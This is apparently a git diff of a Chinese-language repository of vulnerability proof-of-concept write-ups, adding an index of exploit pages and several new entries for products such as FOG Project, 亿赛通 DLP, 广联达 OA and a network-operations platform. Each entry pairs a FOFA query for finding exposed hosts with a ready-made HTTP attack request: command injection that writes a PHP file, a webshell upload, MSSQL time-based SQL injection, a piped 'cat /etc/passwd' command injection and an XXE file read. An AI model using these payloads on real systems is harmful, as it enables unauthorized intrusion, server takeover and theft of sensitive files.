[金和OA-C6-download.jsp任意文件读取漏洞](金和OA-C6-download.jsp任意文件读取漏洞.md) - [金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞](金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md) - - 华天动力OA - [华天动力OA漏洞合集](华天动力OA漏洞.md) - - 易宝OA - [易宝OA_ExecuteSqlForSingle_SQL注入漏洞](易宝OA_ExecuteSqlForSingle_SQL注入漏洞.md) - [易宝OA系统DownloadFile接口存在文件读取漏洞](易宝OA系统DownloadFile接口存在文件读取漏洞.md) - [易宝OA-BasicService.asmx存在任意文件上传漏洞](易宝OA-BasicService.asmx存在任意文件上传漏洞.md) - - 联达OA - [联达OA-UpLoadFile.aspx存在任意文件上传漏洞](联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md) - [联达OA-uploadLogo.aspx存在任意文件上传](联达OA-uploadLogo.aspx存在任意文件上传.md) - - 协达OA - [协达OA系统绕过登录认证登陆后台](协达OA系统绕过登录认证登陆后台.md) - - 红海云eHR - [红海云eHR-PtFjk.mob存在任意文件上传漏洞](红海云eHR-PtFjk.mob存在任意文件上传漏洞.md) - - 金山 - [金山EDR_RCE漏洞](金山EDR_RCE漏洞.md) - [金山WPS_RCE](金山WPS_RCE.md) - [金山终端安全系统V9.0_SQL注入漏洞](金山终端安全系统V9.0_SQL注入漏洞.md) - [金山终端安全系统V9任意文件上传漏洞](金山终端安全系统V9任意文件上传漏洞.md) - - 锐捷 - [锐捷-EG易网关存在RCE漏洞](锐捷-EG易网关存在RCE漏洞.md) - [锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露](锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露.md) @@ -758,23 +753,19 @@ - [锐捷NBR系列路由器存在管理员密码重置漏洞](锐捷NBR系列路由器存在管理员密码重置漏洞.md) - [锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116)](锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md) - [锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞](锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md) - - 安恒明御 - [某恒明御漏洞](某恒明御漏洞.md) - [安恒明御安全网关远程命令执行漏洞](安恒明御安全网关远程命令执行漏洞.md) - - 极限OA - [极限OA接口video_file.php存在任意文件读取漏洞](极限OA接口video_file.php存在任意文件读取漏洞.md) - - 禅道 - [禅道_16.5_router.class.php_SQL注入漏洞](禅道_16.5_router.class.php_SQL注入漏洞.md) - [禅道_v18.0-v18.3_存在后台命令执行漏洞](禅道_v18.0-v18.3_存在后台命令执行漏洞.md) - [禅道项目管理系统身份认证绕过漏洞](禅道项目管理系统身份认证绕过漏洞.md) - [禅道18.5存在后台命令执行漏洞](禅道18.5存在后台命令执行漏洞.md) - - 通天星 - [通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞](通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md) - [鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞](鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md) @@ -783,27 +774,20 @@ - [通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞](通天星CMSV6车载视频监控平台getAlser.acion接口处存在信息泄露漏洞.md) - [通天星CMSV6车载视频监控平台xz_center信息泄露漏洞](通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md) - [通天星CMSV6接口pointManage存在SQL注入](通天星CMSV6接口pointManage存在SQL注入.md) - - 浙大恩特客户资源管理系统 - [浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞](浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md) - - 百卓 Smart S85F - [Smart_S85F_任意文件读取](Smart_S85F_任意文件读取.md) - - 辰信景云终端安全管理系统 - [某信景云终端安全管理系统_login_SQL注入漏洞_](某信景云终端安全管理系统_login_SQL注入漏洞_.md) - - 网御 - [网御_ACM_上网行为管理系统bottomframe.cgi_SQL_注入漏洞](网御_ACM_上网行为管理系统bottomframe.cgi_SQL_注入漏洞.md) - - 迪普DPTech VPN - [迪普DPTech_VPN_任意文件读取](迪普DPTech_VPN_任意文件读取.md) - - 铭飞CMS - [铭飞CMS_list接口存在SQL注入](铭飞CMS_list接口存在SQL注入.md) - [铭飞CMS-search接口存在sql注入漏洞](铭飞CMS-search接口存在sql注入漏洞.md) - [铭飞MCMS接口upload.do存在任意文件上传漏洞](铭飞MCMS接口upload.do存在任意文件上传漏洞.md) - - 飞企互联 - [飞企互联_FE_业务协作平台存在参数文件读取漏洞_](飞企互联_FE_业务协作平台存在参数文件读取漏洞_.md) - [飞企互联-FE企业运营管理平台登录绕过漏洞](飞企互联-FE企业运营管理平台登录绕过漏洞.md) @@ -816,129 +800,96 @@ - [飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞](飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞.md) - [飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞](飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞.md) - [飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞](飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞.md) - - 电信网关配置管理 - [电信网关配置管理后台ipping.php存在命令执行漏洞](电信网关配置管理后台ipping.php存在命令执行漏洞.md) - [电信网关配置管理后台rewrite.php接口存在文件上传漏洞](电信网关配置管理后台rewrite.php接口存在文件上传漏洞.md) - [电信网关配置管理后台del_file.php接口存在命令执行漏洞](电信网关配置管理后台del_file.php接口存在命令执行漏洞.md) - - 瑞友天翼应用虚拟化系统 - [瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞](瑞友天翼应用虚拟化系统appsave接口存在SQL注入漏洞.md) - [瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞](瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞.md) - - 明源云 - [明源云_ERP_ApiUpdate.ashx_文件上传漏洞](明源云_ERP_ApiUpdate.ashx_文件上传漏洞.md) - - 帆软报表 - [帆软报表_V8_get_geo_json_任意文件读取漏洞](帆软报表_V8_get_geo_json_任意文件读取漏洞.md) - - 华夏erp - [jshERP信息泄露漏洞](jshERP信息泄露漏洞.md) - - Kuboard - [Kuboard默认口令](Kuboard默认口令.md) - - 东华医疗协同办公系统 - [东华医疗协同办公系统反序列化漏洞](东华医疗协同办公系统反序列化漏洞.md) - [东华医疗协同办公系统文件上传](东华医疗协同办公系统文件上传.md) - - 速达软件 - [速达软件全系产品存在任意文件上传漏洞](速达软件全系产品存在任意文件上传漏洞.md) - - 汉得SRM - [汉得SRM_tomcat.jsp_登录绕过漏洞](汉得SRM_tomcat.jsp_登录绕过漏洞.md) - - 浙江宇视 - [浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞](浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md) - - 海翔ERP - [海翔ERP_SQL注入漏洞](海翔ERP_SQL注入漏洞.md) - - 联想网盘 - [联想网盘存在任意文件上传漏洞](联想网盘存在任意文件上传漏洞.md) - - 科荣 - [科荣_AIO任意文件上传-目录遍历-任意文件读取漏洞](科荣_AIO任意文件上传-目录遍历-任意文件读取漏洞.md) - [科荣AIO-moffice接口存在SQL注入漏洞](科荣AIO-moffice接口存在SQL注入漏洞.md) - - 脸爱云 - [脸爱云_一脸通智慧管理平台任意用户添加漏洞](脸爱云_一脸通智慧管理平台任意用户添加漏洞.md) - [脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞](脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞.md) - [脸爱云一脸通智慧平台SelOperators信息泄露漏洞](脸爱云一脸通智慧平台SelOperators信息泄露漏洞.md) - [脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞](脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md) - - 中远麒麟堡垒机 - [中远麒麟堡垒机SQL注入](中远麒麟堡垒机SQL注入.md) - - 思福迪运维安全管理系统 - [思福迪运维安全管理系统RCE漏洞](思福迪运维安全管理系统RCE漏洞.md) - - 西软云 - [西软云XMS反序列化漏洞](西软云XMS反序列化漏洞.md) - [西软云XMS-futurehotel-operate接口存在XXE漏洞](西软云XMS-futurehotel-operate接口存在XXE漏洞.md) - [西软云XMS-futurehotel-query接口存在XXE漏洞](西软云XMS-futurehotel-query接口存在XXE漏洞.md) - - 宝塔 - [宝塔最新未授权访问漏洞及sql注入](宝塔最新未授权访问漏洞及sql注入.md) - - 福建科立讯通信 - [福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞](福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md) - [福建科立讯通信有限公司指挥调度管理平台RCE](福建科立讯通信有限公司指挥调度管理平台RCE.md) - [福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞](福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md) - [福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞](福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞.md) - - JeePlus低代码开发平台 - [JeePlus低代码开发平台存在SQL注入漏洞](JeePlus低代码开发平台存在SQL注入漏洞.md) - [Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞](Jeecg-jeecgFormDemoController存在JNDI代码执行漏洞.md) - - 润乾报表 - [润乾报表InputServlet接口存在文件上传漏洞](润乾报表InputServlet接口存在文件上传漏洞.md) - [润乾报表平台InputServlet存在任意文件读取漏洞](润乾报表平台InputServlet存在任意文件读取漏洞.md) - [润乾报表dataSphereServlet任意文件上传](润乾报表dataSphereServlet任意文件上传.md) - - 广州图创图书馆集群管理系统 - [广州图创图书馆集群管理系统存在未授权访问](广州图创图书馆集群管理系统存在未授权访问.md) - [广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞](广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md) - [广州图书馆集群系统WebBookNew存在SQL注入漏洞](广州图书馆集群系统WebBookNew存在SQL注入漏洞.md) - - 中国移动 - [中国移动云控制台存在任意文件读取](中国移动云控制台存在任意文件读取.md) - - 云时空 - [云时空社会化商业ERP任意文件上传](云时空社会化商业ERP任意文件上传.md) - [云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞](云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞.md) - [时空智友企业流程化管控系统formservice存在SQL注入漏洞](时空智友企业流程化管控系统formservice存在SQL注入漏洞.md) - - 潍微科技 - [潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞](潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md) - - 魔方网表 - [魔方网表mailupdate.jsp接口存在任意文件上传漏洞](魔方网表mailupdate.jsp接口存在任意文件上传漏洞.md) - - 微擎 - [微擎-AccountEdit-file-upload文件上传漏洞](微擎-AccountEdit-file-upload文件上传漏洞.md) - - Ncast高清智能录播系统 - [Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305)](Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md) - [Ncast高清智能录播系统存在任意文件读取漏洞](Ncast高清智能录播系统存在任意文件读取漏洞.md) - - 中成科信票务管理系统 - [中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞](中成科信票务管理系统ReserveTicketManagerPlane.ashx存在SQL注入漏洞.md) - - 普元EOS-Platform - [普元EOS-Platform-eos.jmx存在远程代码执行漏洞](普元EOS-Platform-eos.jmx存在远程代码执行漏洞.md) - [普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691)](普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691).md) - - 和丰多媒体信息发布系统 - [和丰多媒体信息发布系统QH.aspx存在文件上传漏洞](和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md) - - LVS精益价值管理系统 - [LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞](LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md) - [LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞](LVS精益价值管理系统LVS.Web.ashx存在SQL注入漏洞.md) - - 蓝海卓越计费管理系统 - [蓝海卓越计费管理系统SQL注入漏洞](蓝海卓越计费管理系统SQL注入漏洞.md) @@ -946,11 +897,9 @@ - [蓝海卓越计费管理系统存在debug.php远程命令执行漏洞](蓝海卓越计费管理系统存在debug.php远程命令执行漏洞.md) - [蓝海卓越计费管理系统存在download.php任意文件读取漏洞](蓝海卓越计费管理系统存在download.php任意文件读取漏洞.md) - - 智邦国际ERP - [智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞](智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞.md) - - 湖南建研检测系统 - [湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞](湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞.md) @@ -958,41 +907,31 @@ - [湖南建研-检测系统_admintool_任意文件上传](湖南建研-检测系统_admintool_任意文件上传.md) - [湖南建研质量监测系统upload.ashx文件上传漏洞](湖南建研质量监测系统upload.ashx文件上传漏洞.md) - - 翰智员工服务平台 - [翰智员工服务平台loginByPassword存在SQL注入漏洞](翰智员工服务平台loginByPassword存在SQL注入漏洞.md) - - 科讯图书馆综合管理云平台 - [科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入](科讯图书馆综合管理云平台WebCloud.asmx存在SQL注入.md) - - DT高清车牌识别摄像机 - [DT高清车牌识别摄像机存在任意文件读取漏洞](DT高清车牌识别摄像机存在任意文件读取漏洞.md) - - 迈普多业务融合网关 - [迈普多业务融合网关send_order.cgi存在命令执行漏洞](迈普多业务融合网关send_order.cgi存在命令执行漏洞.md) - - 因酷教育软件开源网校程序 - [因酷教育软件开源网校程序gok4任意文件上传漏洞](因酷教育软件开源网校程序gok4任意文件上传漏洞.md) - - 科拓全智能停车收费系统 - [科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞](科拓全智能停车收费系统DoubtCarNoListFrom.aspx存在SQL注入漏洞.md) - [科拓全智能停车收费系统Webservice.asmx存在任意文件上传](科拓全智能停车收费系统Webservice.asmx存在任意文件上传.md) - - 天智云智造管理平台 - [天智云智造管理平台Usermanager.ashx存在SQL注入漏洞](天智云智造管理平台Usermanager.ashx存在SQL注入漏洞.md) - - 悟空CRM - [悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052)](悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052).md) - - 契约锁电子签章系统 - [契约锁电子签章系统RCE](契约锁电子签章系统RCE.md) - [契约锁电子签章平台add远程命令执行漏洞](契约锁电子签章平台add远程命令执行漏洞.md) - - 云匣子堡垒机 - [云匣子堡垒机fastjson漏洞](云匣子堡垒机fastjson漏洞.md) - [云匣子系统接口ssoToolReport存在远程代码执行漏洞](云匣子系统接口ssoToolReport存在远程代码执行漏洞.md) @@ -1256,6 +1195,7 @@ - SeaCMS海洋影视管理系统 - [SeaCMS海洋影视管理系统dmku存在SQL注入漏洞](SeaCMS海洋影视管理系统dmku存在SQL注入漏洞.md) + - [海洋CMS后台admin_smtp.php存在远程代码执行漏洞](海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md) - 安达通TPN-2G安全网关 @@ -1467,7 +1407,8 @@ - 赛蓝企业管理系统 - [赛蓝企业管理系统DownloadBuilder任意文件读取漏洞](赛蓝企业管理系统DownloadBuilder任意文件读取漏洞.md) - + - [赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞](赛蓝企业管理系统GetExcellTemperature存在SQL注入漏洞.md) + - 上讯信息技术股份有限公司 - [上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞](上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞.md) @@ -1533,3 +1474,30 @@ - 鲸发卡系统 - [鲸发卡系统自动发卡网request_post存在任意文件读取漏洞](鲸发卡系统自动发卡网request_post存在任意文件读取漏洞.md) + +- 全息AI网络运维平台 + - [全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞](全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞.md) + +- 1Panel面板 + - [1Panel面板最新前台RCE漏洞(CVE-2024-39911)](1Panel面板最新前台RCE漏洞(CVE-2024-39911).md) + +- 云课网校系统 + - [云课网校系统文件上传漏洞(DVB-2024-6594)](云课网校系统文件上传漏洞(DVB-2024-6594).md) + +- SuiteCRM系统 + - [SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412)](SuiteCRM系统接口responseEntryPoint存在SQL注入漏洞(CVE-2024-36412).md) + +- 某自动发卡网 + - [某自动发卡网alipay_notify.php存在SQL注入漏洞](某自动发卡网alipay_notify.php存在SQL注入漏洞.md) + +- **Netgear-WN604** + - [Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646)](Netgear-WN604接口downloadFile.php信息泄露漏洞(CVE-2024-6646).md) + +- fogproject + - [fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914)](fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914).md) + +- 拼团零售商城系统 + - [拼团零售商城系统前台任意文件写入漏洞](拼团零售商城系统前台任意文件写入漏洞.md) + +- LiveNVR流媒体服务软件 + - [LiveNVR流媒体服务软件接口存在未授权访问漏洞](LiveNVR流媒体服务软件接口存在未授权访问漏洞.md) diff --git "a/fogproject\347\263\273\347\273\237\346\216\245\345\217\243export.php\345\255\230\345\234\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-39914).md" "b/fogproject\347\263\273\347\273\237\346\216\245\345\217\243export.php\345\255\230\345\234\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-39914).md" new file mode 100644 index 0000000..7dc197c --- /dev/null +++ "b/fogproject\347\263\273\347\273\237\346\216\245\345\217\243export.php\345\255\230\345\234\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236(CVE-2024-39914).md" @@ -0,0 +1,25 @@ +# fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914) + +FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。 + +## fofa + +```yaml +body="FOG Project" +``` + +## poc + +```yaml +POST /fog/management/export.php?filename=$(echo+''+>+lol.php)&type=pdf HTTP/1.1 +Host: 192.168.15.5 +Content-Length: 21 +User-Agent: ToxicPotato +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +fogguiuser=fog&nojson=2 +``` + +![victory](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407191238873.png) + +文件路径:`/fog/management/lol.php` \ No newline at end of file diff --git "a/\344\272\221\350\257\276\347\275\221\346\240\241\347\263\273\347\273\237\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236(DVB-2024-6594).md" "b/\344\272\221\350\257\276\347\275\221\346\240\241\347\263\273\347\273\237\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236(DVB-2024-6594).md" new file mode 100644 index 0000000..a401138 --- /dev/null +++ "b/\344\272\221\350\257\276\347\275\221\346\240\241\347\263\273\347\273\237\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236(DVB-2024-6594).md" @@ -0,0 +1,31 @@ +# 云课网校系统文件上传漏洞(DVB-2024-6594) + +云课网校系统是一款基于ThinkPhP框架的网校系统,包含直播,点播,考试,问答,论坛,文章等模块,是一款最具性价比的线上学习系统。该系统存在任意文件上传漏洞,攻击者可以直接上传webshell文件获取服务器权限 + +## fofa + +```yaml +"/static/libs/common/jquery.stickyNavbar.min.js" +``` + +## poc + +```yaml +POST /api/uploader/uploadImage HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: no-cache +Connection: keep-alive +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m +x-requested-with: XMLHttpRequest + +------WebKitFormBoundaryLZbmKeasWgo2gPtU +Content-Disposition: form-data; name="file"; filename="1G3311040N.php" +Content-Type: image/gif + + +------WebKitFormBoundaryLZbmKeasWgo2gPtU-- +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407190040362.png) \ No newline at end of file diff --git "a/\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NetSecConfigAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NetSecConfigAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..1b16d63 --- /dev/null +++ "b/\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NetSecConfigAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,39 @@ +# 亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞 + +亿某通电子文档安全管理系统` NetSecConfigAjax`接口的`state`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```yaml +POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 +Host: +Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: cross-site +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Priority: u=0, i +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 98 + +command=updateNetSec&state=* +``` + +![image-20240718165313729](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407181654824.png) \ No newline at end of file diff --git "a/\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NoticeAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NoticeAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..5ab1c47 --- /dev/null +++ "b/\344\272\277\350\265\233\351\200\232\347\224\265\345\255\220\346\226\207\346\241\243\345\256\211\345\205\250\347\256\241\347\220\206\347\263\273\347\273\237NoticeAjax\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,38 @@ +# 亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞 + +亿某通电子文档安全管理系统` NoticeAjax`接口的`noticeId`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-DLP" +``` + +## poc + +```yaml +POST /CDGServer3/NoticeAjax;Service HTTP/1.1 +Host: ip:8443 +Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Priority: u=0, i +Connection: close +Content-Length: 98 +Content-Type: application/x-www-form-urlencoded + +command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- +``` + +![image-20240718165542392](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407181655455.png) \ No newline at end of file diff --git "a/\345\205\250\346\201\257AI\347\275\221\347\273\234\350\277\220\347\273\264\345\271\263\345\217\260ajax_cloud_router_config.php\345\255\230\345\234\250\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/\345\205\250\346\201\257AI\347\275\221\347\273\234\350\277\220\347\273\264\345\271\263\345\217\260ajax_cloud_router_config.php\345\255\230\345\234\250\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" new file mode 100644 index 0000000..cf2ca2a --- /dev/null +++ "b/\345\205\250\346\201\257AI\347\275\221\347\273\234\350\277\220\347\273\264\345\271\263\345\217\260ajax_cloud_router_config.php\345\255\230\345\234\250\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" @@ -0,0 +1,20 @@ +# 全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞 + +全息AI网络运维平台 接口 /nmss/cloud/Ajax/ajax_cloud_router_config.php 存在命令执行漏洞,导致服务器沦陷。 + +## fofa + +```yaml +"全息AI网络运维平台" +``` + +## poc + +```yaml +POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1 +host:127.0.0.1 + +ping_cmd=8.8.8.8|cat /etc/passwd>1.txt +``` + +![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407190100660.png) \ No newline at end of file diff --git "a/\345\271\277\350\201\224\350\276\276OA\346\216\245\345\217\243ArchiveWebService\345\255\230\345\234\250XML\345\256\236\344\275\223\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\271\277\350\201\224\350\276\276OA\346\216\245\345\217\243ArchiveWebService\345\255\230\345\234\250XML\345\256\236\344\275\223\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..513817f --- /dev/null +++ "b/\345\271\277\350\201\224\350\276\276OA\346\216\245\345\217\243ArchiveWebService\345\255\230\345\234\250XML\345\256\236\344\275\223\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,32 @@ +# 广联达OA接口ArchiveWebService存在XML实体注入漏洞 + +广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。 + +## fofa + +```yaml +body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx" +``` + +## poc + +```yaml +POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo" + + + + + + <!DOCTYPE Archive [ <!ENTITY secret SYSTEM "file:///windows/win.ini"> ]> <Archive> <ArchiveInfo> <UploaderID> ############ &secret; ############## </UploaderID> </ArchiveInfo> <Result> <MainDoc>Document Content</MainDoc> </Result> <DocInfo> <DocTypeID>1</DocTypeID> <DocVersion>1.0</DocVersion> </DocInfo> </Archive> + string + string + + + +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407181247294.png) \ No newline at end of file diff --git "a/\346\213\274\345\233\242\351\233\266\345\224\256\345\225\206\345\237\216\347\263\273\347\273\237\345\211\215\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\346\274\217\346\264\236.md" 